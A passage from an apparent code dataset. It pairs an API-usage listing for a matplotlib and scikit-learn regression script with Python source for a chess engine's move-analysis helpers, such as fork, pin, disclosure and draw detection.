"usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "utils.ml_utils.IMG_PATH", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "utils.ml_utils.standardize", "line_number": 62, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 65, "usage_type": "call"}, {"api_name": "algorithms.linear_regression_gd.LinearRegressionGD", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 70, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 71, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 71, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 72, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "utils.ml_utils.IMG_PATH", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "utils.ml_utils.lin_regplot", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "utils.ml_utils.IMG_PATH", "line_number": 77, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "utils.ml_utils.standardize", "line_number": 92, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 97, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 98, "usage_type": "call"}, {"api_name": "utils.ml_utils.lin_regplot", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "utils.ml_utils.IMG_PATH", "line_number": 108, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "numpy.hstack", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 114, "usage_type": "attribute"}, {"api_name": "numpy.dot", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 123, "usage_type": "call"}, {"api_name": "utils.ml_utils.standardize", "line_number": 126, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 129, "usage_type": "call"}, {"api_name": "sklearn.linear_model.RANSACRegressor", "line_number": 131, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.logical_not", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 142, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 143, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 143, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 144, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 144, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 145, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 145, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 146, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 146, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 147, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 147, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 148, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 148, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 149, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 149, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 150, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 150, "usage_type": "name"}, {"api_name": "utils.ml_utils.IMG_PATH", "line_number": 150, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 151, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 151, "usage_type": "name"}, {"api_name": "numpy.transpose", "line_number": 156, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 156, "usage_type": "call"}, {"api_name": "utils.ml_utils.standardize", "line_number": 159, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 162, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 164, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 165, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.PolynomialFeatures", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 170, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 170, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 178, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 178, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 179, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 179, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 180, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 180, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 181, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 181, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 183, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 183, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 184, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 184, "usage_type": "name"}, {"api_name": "utils.ml_utils.IMG_PATH", "line_number": 184, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 185, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 185, "usage_type": "name"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 190, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 191, "usage_type": "call"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 193, "usage_type": "call"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 194, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 199, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 199, "usage_type": "call"}, {"api_name": "utils.ml_utils.standardize", "line_number": 202, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 205, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 207, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.PolynomialFeatures", "line_number": 210, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.PolynomialFeatures", "line_number": 211, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 216, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 216, "usage_type": "attribute"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 220, "usage_type": "call"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 224, "usage_type": "call"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 228, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 232, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 232, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 234, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 234, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 240, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 240, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 246, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 246, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 252, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 252, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 253, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 253, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 254, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 254, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 255, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 255, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 256, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 256, "usage_type": "name"}, {"api_name": "utils.ml_utils.IMG_PATH", "line_number": 256, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 257, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 257, "usage_type": "name"}, {"api_name": "pdb.set_trace", "line_number": 259, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 261, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 265, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 265, "usage_type": "attribute"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 268, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 271, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 271, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 272, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 272, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 277, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 277, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 278, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 278, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 279, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 279, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 280, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 280, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 281, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 281, "usage_type": "name"}, {"api_name": "utils.ml_utils.IMG_PATH", "line_number": 281, "usage_type": "name"}, {"api_name": "numpy.transpose", "line_number": 286, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 286, "usage_type": "call"}, {"api_name": "utils.ml_utils.standardize", "line_number": 289, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 292, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeRegressor", "line_number": 294, "usage_type": "call"}, {"api_name": "utils.ml_utils.lin_regplot", "line_number": 297, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 298, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 298, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 299, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 299, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 300, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 300, "usage_type": "name"}, {"api_name": "utils.ml_utils.IMG_PATH", "line_number": 300, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 301, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 301, "usage_type": "name"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 303, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 311, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 312, "usage_type": "call"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 314, "usage_type": "call"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 315, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 317, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 317, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 324, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 324, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 331, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 331, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 332, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 332, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 333, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 333, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hlines", "line_number": 334, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 334, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 335, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 335, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 336, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 336, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 337, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 337, "usage_type": "name"}, {"api_name": "utils.ml_utils.IMG_PATH", "line_number": 337, "usage_type": "name"}]}
+{"seq_id": "2094413798", "text": "from operator import attrgetter\nimport copy\nfrom .values import *\nfrom .match import *\nfrom .move import *\nfrom .helper import reverse_lookup\nfrom .analyze_helper import *\nfrom .pieces.pawn import cPawn\nfrom .pieces.knight import cKnight\nfrom .pieces.bishop import cBishop\nfrom .pieces.rook import cRook\nfrom .pieces.king import cKing\nfrom .pieces.queen import cQueen\nfrom .pieces.piece import cTouch\nfrom .pieces.pieces_helper import obj_for_piece\nfrom .generator import cGenerator\n\n\ndef castles(gmove):\n match = gmove.match\n piece = match.readfield(gmove.srcx, gmove.srcy)\n if(piece == PIECES['wKg'] or piece == PIECES['bKg']):\n if(gmove.srcx - gmove.dstx == 2 or gmove.srcx - gmove.dstx == -2):\n return True\n\n\ndef promotes(gmove):\n if(gmove.prom_piece != PIECES['blk']):\n return True\n\n\ndef captures(gmove):\n match = gmove.match\n piece = match.readfield(gmove.srcx, gmove.srcy)\n color = match.color_of_piece(piece)\n dstpiece = match.readfield(gmove.dstx, gmove.dsty)\n if(dstpiece != PIECES['blk']):\n return True\n elif( (piece == PIECES['wPw'] or piece == PIECES['bPw']) and gmove.srcx != gmove.dstx ):\n return True\n else:\n return False\n\n\ndef defends_fork(gmove):\n match = gmove.match\n piece = match.readfield(gmove.srcx, gmove.srcy)\n match.do_move(gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, gmove.prom_piece)\n cpiece = obj_for_piece(match, piece, gmove.dstx, gmove.dsty)\n if(cpiece):\n is_fork_defend = cpiece.defends_fork()\n else:\n is_fork_defend = False\n match.undo_move()\n return is_fork_defend\n\n\ndef threatens_fork(gmove):\n is_fork_threat = False\n match = gmove.match\n match.do_move(gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, gmove.prom_piece)\n piece = match.readfield(gmove.dstx, gmove.dsty)\n cpiece = obj_for_piece(match, piece, gmove.dstx, gmove.dsty)\n if(cpiece):\n is_fork_threat = cpiece.threatens_fork()\n match.undo_move()\n return is_fork_threat\n\n\ndef flees(gmove):\n match = gmove.match\n lower_enmy_cnt_old = 0\n lower_enmy_cnt_new = 0\n piece = match.readfield(gmove.srcx, gmove.srcy)\n color = match.color_of_piece(piece)\n\n piece = match.readfield(gmove.srcx, gmove.srcy)\n if(piece == PIECES['wKg'] or piece == PIECES['bKg']):\n return False\n\n frdlytouches_old, enmytouches_old = list_all_field_touches(match, color, gmove.srcx, gmove.srcy)\n ###\n match.do_move(gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, gmove.prom_piece)\n frdlytouches_new, enmytouches_new = list_all_field_touches(match, color, gmove.dstx, gmove.dsty)\n match.undo_move()\n ###\n\n if(len(enmytouches_old) > 0 and \n (len(frdlytouches_old) < len(frdlytouches_new))):\n return True\n\n if(len(enmytouches_old) > len(enmytouches_new)):\n return True\n\n for enmy in enmytouches_old:\n if(PIECES_RANK[enmy.piece] < PIECES_RANK[piece]):\n lower_enmy_cnt_old += 1\n for enmy in enmytouches_new:\n if(PIECES_RANK[enmy.piece] < PIECES_RANK[piece]):\n lower_enmy_cnt_new += 1\n if(lower_enmy_cnt_old > lower_enmy_cnt_new):\n return True\n else:\n return False\n\n\ndef find_attacks_and_supports_after_move(gmove):\n attacked = []\n supported = []\n match = gmove.match\n piece = match.readfield(gmove.srcx, gmove.srcy)\n ###\n match.do_move(gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, gmove.prom_piece)\n cpiece = obj_for_piece(match, piece, gmove.dstx, gmove.dsty)\n if(cpiece):\n cpiece.find_attacks_and_supports(attacked, supported)\n \n if(cpiece.piece == PIECES['wKg'] or cpiece.piece == PIECES['bKg']):\n if(gmove.srcx - gmove.dstx == -2):\n crook = cRook(match, gmove.dstx - 1, gmove.dsty)\n crook.find_attacks_and_supports(attacked, supported)\n elif(gmove.srcx - gmove.dstx == 2):\n crook = cRook(match, gmove.dstx + 1, gmove.dsty)\n crook.find_attacks_and_supports(attacked, supported)\n match.undo_move()\n ###\n return attacked, supported\n\n\ndef find_attacks_on_and_supports_of_dstfield_after_move(gmove):\n match = gmove.match\n piece = match.readfield(gmove.srcx, gmove.srcy)\n match.do_move(gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, gmove.prom_piece)\n frdlytouches, enmytouches = list_all_field_touches(match, match.color_of_piece(piece), gmove.dstx, gmove.dsty)\n match.undo_move()\n return frdlytouches, enmytouches\n\n\ndef does_unpin(gmove):\n match = gmove.match\n piece = match.readfield(gmove.srcx, gmove.srcy)\n color = match.color_of_piece(piece)\n pinlines_before = search_lines_of_pin(match, color, gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty)\n ###\n match.do_move(gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, gmove.prom_piece)\n pinlines_after = search_lines_of_pin(match, color, gmove.dstx, gmove.dsty, None, None)\n match.undo_move()\n ###\n if(len(pinlines_after) < len(pinlines_before)):\n return True\n for pbefore in pinlines_before:\n identical = False\n for pafter in pinlines_after:\n if(pbefore[0].fieldx == pafter[0].fieldx and pbefore[0].fieldy == pafter[0].fieldy):\n identical = True\n if(identical == False):\n return True\n return False\n\n\ndef defends_check(match):\n if(match.next_color() == COLORS['white']):\n cking = cKing(match, match.board.wKg_x, match.board.wKg_y)\n else:\n cking = cKing(match, match.board.bKg_x, match.board.bKg_y)\n return cking.is_attacked()\n\n\ndef check_mates(gmove):\n match = gmove.match\n match.do_move(gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, gmove.prom_piece)\n is_move_available = match.is_move_available()\n match.undo_move()\n return not is_move_available\n\n\ndef find_disclosed_pieces(match, srcx, srcy, dstx, dsty, discl_attacked, discl_supported):\n piece = match.readfield(srcx, srcy)\n color = match.color_of_piece(piece)\n idx = 0\n for step in cQueen.STEPS:\n if(idx % 2 == 0):\n first = cTouch(PIECES['blk'], 0, 0)\n second = cTouch(PIECES['blk'], 0, 0)\n if(idx < 4):\n cpiece = cRook\n excluded_dir = cRook.dir_for_move(srcx, srcy, dstx, dsty)\n faces = [PIECES['wRk'], PIECES['bRk'], PIECES['wQu'], PIECES['bQu']]\n else:\n cpiece = cBishop\n excluded_dir = cBishop.dir_for_move(srcx, srcy, dstx, dsty)\n faces = [PIECES['wBp'], PIECES['bBp'], PIECES['wQu'], PIECES['bQu']]\n idx += 1\n\n stepx = step[0]\n stepy = step[1]\n direction = cpiece.dir_for_move(srcx, srcy, (srcx + stepx), (srcy + stepy))\n if(direction == excluded_dir or direction == match.REVERSE_DIRS[excluded_dir]):\n break\n x1, y1 = match.search(srcx, srcy, stepx, stepy)\n if(x1 is not None):\n piece = match.readfield(x1, y1)\n if(first.piece == PIECES['blk']):\n first.piece = piece\n first.fieldx = x1\n first.fieldy = y1\n continue\n elif(second.piece == PIECES['blk']):\n second.piece = piece\n second.fieldx = x1\n second.fieldy = y1\n\n if(first.piece == PIECES['blk'] or second.piece == PIECES['blk']):\n continue\n \n if(match.color_of_piece(first.piece) != match.color_of_piece(second.piece)):\n if(match.color_of_piece(first.piece) == color):\n for face in faces:\n if(first.piece == face):\n discl_attacked.append(second)\n break\n else:\n for face in faces:\n if(second.piece == face):\n discl_attacked.append(first)\n break\n elif(match.color_of_piece(first.piece) == match.color_of_piece(second.piece)):\n if(match.color_of_piece(first.piece) == color):\n for face in faces:\n if(first.piece == face):\n discl_supported.append(second)\n break\n for face in faces:\n if(second.piece == face):\n discl_supported.append(first)\n break\n\ndef find_disclosures(match, gmove):\n discl_attacked = []\n discl_supported = []\n\n piece = match.readfield(gmove.srcx, gmove.srcy)\n color = match.color_of_piece(piece)\n\n match.do_move(gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, gmove.prom_piece)\n find_disclosed_pieces(match, gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, discl_attacked, discl_supported)\n match.undo_move()\n ###\n match.writefield(gmove.srcx, gmove.srcy, PIECES['blk'])\n\n for ctouch_beyond in discl_attacked:\n list_field_touches_beyond(match, color, ctouch_beyond)\n\n for ctouch_beyond in discl_supported:\n list_field_touches_beyond(match, color, ctouch_beyond)\n\n match.writefield(gmove.srcx, gmove.srcy, piece)\n ###\n \n return discl_attacked, discl_supported\n\n\ndef blocks(gmove):\n STEPS = [ [0, 1], [1, 0], [1, 1], [-1, 1] ]\n match = gmove.match\n piece = match.readfield(gmove.srcx, gmove.srcy)\n color = match.color_of_piece(piece)\n #frdlytouches_before_count = 0\n enmytouches_before_count = 0\n #frdlytouches_after_count = 0\n enmytouches_after_count = 0\n\n for step in STEPS:\n stepx = step[0]\n stepy = step[1]\n x1, y1, x2, y2 = match.search_bi_dirs(gmove.dstx, gmove.dsty, stepx, stepy)\n if(x1 is not None):\n if((x1 == gmove.srcx and y1 == gmove.srcy) or\n (x2 == gmove.srcx and y2 == gmove.srcy)):\n continue\n piece1 = match.readfield(x1, y1)\n piece2 = match.readfield(x2, y2)\n if(match.color_of_piece(piece1) == match.color_of_piece(piece2)):\n continue\n if(match.color_of_piece(piece1) == color):\n frdlytouches, enmytouches = list_all_field_touches(match, color, x1, y1)\n else:\n frdlytouches, enmytouches = list_all_field_touches(match, color, x2, y2)\n enmytouches_before_count += len(enmytouches)\n\n match.do_move(gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, gmove.prom_piece)\n\n for step in STEPS:\n stepx = step[0]\n stepy = step[1]\n x1, y1, x2, y2 = match.search_bi_dirs(gmove.dstx, gmove.dsty, stepx, stepy)\n if(x1 is not None):\n if((x1 == gmove.srcx and y1 == gmove.srcy) or\n (x2 == gmove.srcx and y2 == gmove.srcy)):\n continue\n piece1 = match.readfield(x1, y1)\n piece2 = match.readfield(x2, y2)\n if(match.color_of_piece(piece1) == match.color_of_piece(piece2)):\n continue\n if(match.color_of_piece(piece1) == color):\n frdlytouches, enmytouches = list_all_field_touches(match, color, x1, y1)\n else:\n frdlytouches, enmytouches = list_all_field_touches(match, color, x2, y2)\n enmytouches_after_count += len(enmytouches)\n\n match.undo_move()\n\n if(enmytouches_after_count < enmytouches_before_count):\n return True\n else:\n return False\n\n\ndef running_pawn_in_endgame(gmove):\n if(gmove.match.is_endgame()):\n piece = gmove.match.readfield(gmove.srcx, gmove.srcy)\n if(piece == PIECES['wPw'] or piece == PIECES['bPw']):\n cpawn = cPawn(gmove.match, gmove.srcx, gmove.srcy)\n return cpawn.is_running()\n return False\n\n\ndef defends_invasion(match, gmove):\n piece = match.readfield(gmove.srcx, gmove.srcy)\n color = match.color_of_piece(piece)\n board = [[0] * 8 for i in range(8)]\n\n for y in range(8):\n for x in range(8):\n piece = match.readfield(x, y)\n if(match.color_of_piece(piece) == COLORS['white']):\n board[y][x] += 1\n elif(match.color_of_piece(piece) == COLORS['black']):\n board[y][x] -= 1\n \n return False\n\ndef controles_file(gmove):\n match = gmove.match\n piece = match.readfield(gmove.srcx, gmove.srcy)\n\n if(piece == PIECES['wBp'] or piece == PIECES['bBp']):\n cbishop = cBishop(match, gmove.srcx, gmove.srcy)\n return cbishop.move_controles_file(gmove.dstx, gmove.dsty)\n elif(piece == PIECES['wRk'] or piece == PIECES['bRk']):\n crook = cRook(match, gmove.srcx, gmove.srcy)\n return crook.move_controles_file(gmove.dstx, gmove.dsty)\n elif(piece == PIECES['wQu'] or piece == PIECES['bQu']):\n cqueen = cQueen(match, gmove.srcx, gmove.srcy)\n return cqueen.move_controles_file(gmove.dstx, gmove.dsty)\n else:\n return False\n\ndef is_tactical_draw(gmove):\n newmatch = copy.deepcopy(gmove.match)\n newmatch.do_move(gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, gmove.prom_piece)\n\n #if(newmatch.board.fifty_moves_count >= 49):\n #return True\n\n if(len(newmatch.move_list) < 9):\n return False\n\n boards = []\n for i in range(9):\n str_board = \"\"\n for y in range(8):\n for x in range(8):\n piece = newmatch.readfield(x, y)\n str_board += reverse_lookup(PIECES, piece)\n boards.append(str_board)\n newmatch.undo_move()\n\n count = 0\n str_board = boards[0]\n for i in range(1, 9):\n if(boards[i] == str_board):\n count += 1\n\n return count >= 2\n\n\ndef is_progress(gmove):\n match = gmove.match\n if(match.is_opening()):\n piece = match.readfield(gmove.srcx, gmove.srcy)\n if(piece == PIECES['wPw']):\n if(gmove.srcy == match.board.COORD['2'] and \n gmove.srcx >= match.board.COORD['3'] and gmove.srcx <= match.board.COORD['6']):\n return True\n elif(piece == PIECES['bPw']):\n if(gmove.srcy == match.board.COORD['7'] and \n gmove.srcx >= match.board.COORD['3'] and gmove.srcx <= match.board.COORD['6']):\n return True\n elif(piece == PIECES['wKn']):\n if(gmove.srcy == match.board.COORD['1'] and \n (gmove.srcx == match.board.COORD['2'] or gmove.srcx == match.board.COORD['7'])):\n return True\n elif(piece == PIECES['bKn']):\n if(gmove.srcy == match.board.COORD['8'] and \n (gmove.srcx == match.board.COORD['2'] or gmove.srcx == match.board.COORD['7'])):\n return True\n elif(piece == PIECES['wBp']):\n if(gmove.srcy == match.board.COORD['1'] and \n (gmove.srcx == match.board.COORD['3'] or gmove.srcx == match.board.COORD['6'])):\n return True\n elif(piece == PIECES['bBp']):\n if(gmove.srcy == match.board.COORD['8'] and \n (gmove.srcx == match.board.COORD['3'] or gmove.srcx == match.board.COORD['6'])):\n return True\n return False\n else:\n return False\n\n\ndef rank_gmoves(match, priomoves, piecescnt, last_pmove, dbggmove, dbgprio):\n all_attacking = []\n all_supporting = []\n all_fork_defending = []\n all_discl_attacking = []\n all_discl_supporting = []\n all_fleeing = []\n all_running = []\n excludes = []\n\n for priomove in priomoves:\n gmove = priomove.gmove\n from_dstfield_attacked, from_dstfield_supported = find_attacks_and_supports_after_move(gmove)\n frdlytouches_on_dstfield, enmytouches_on_dstfield = find_attacks_on_and_supports_of_dstfield_after_move(gmove)\n discl_attacked, discl_supported = find_disclosures(match, 